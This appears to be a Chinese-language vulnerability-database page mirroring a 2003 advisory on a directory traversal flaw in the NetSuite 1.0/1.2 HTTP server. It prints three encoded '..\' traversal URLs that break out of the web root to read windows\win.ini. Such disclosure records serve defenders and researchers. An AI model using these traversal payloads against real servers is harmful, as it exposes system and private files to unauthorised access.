NetSuite 1.0/1.2 – HTTP Server Directory Traversal

15次阅读
没有评论

NetSuite 1.0/1.2 – HTTP Server Directory Traversal

漏洞ID 1054033 漏洞类型
发布时间 2003-07-15 更新时间 2003-07-15
NetSuite 1.0/1.2 - HTTP Server Directory TraversalCVE编号 N/A
NetSuite 1.0/1.2 - HTTP Server Directory TraversalCNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22909
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8197/info

The HTTP component of NetSuite has been reported prone to a directory traversal vulnerability.

Various combinations of encoded directory traversal sequences may be used to break out of the web root directory. Attackers may gain access to files that are readable by the web server as a result. 

http://www.example.com/%5c..%5c..%5c..%5cwindows%5cwin.ini
http://www.example.com/%5c..%5c..%5c..%5cwindows%5cwin%2eini
http://www.example.com/......windowswin.ini

相关推荐: Monkey HTTP Daemon Excessive POST Data Buffer Overflow Vulnerability

Monkey HTTP Daemon Excessive POST Data Buffer Overflow Vulnerability 漏洞ID 1076228 漏洞类型 Boundary Condition Error 发布时间 2003-03-24 更新…

正文完
 0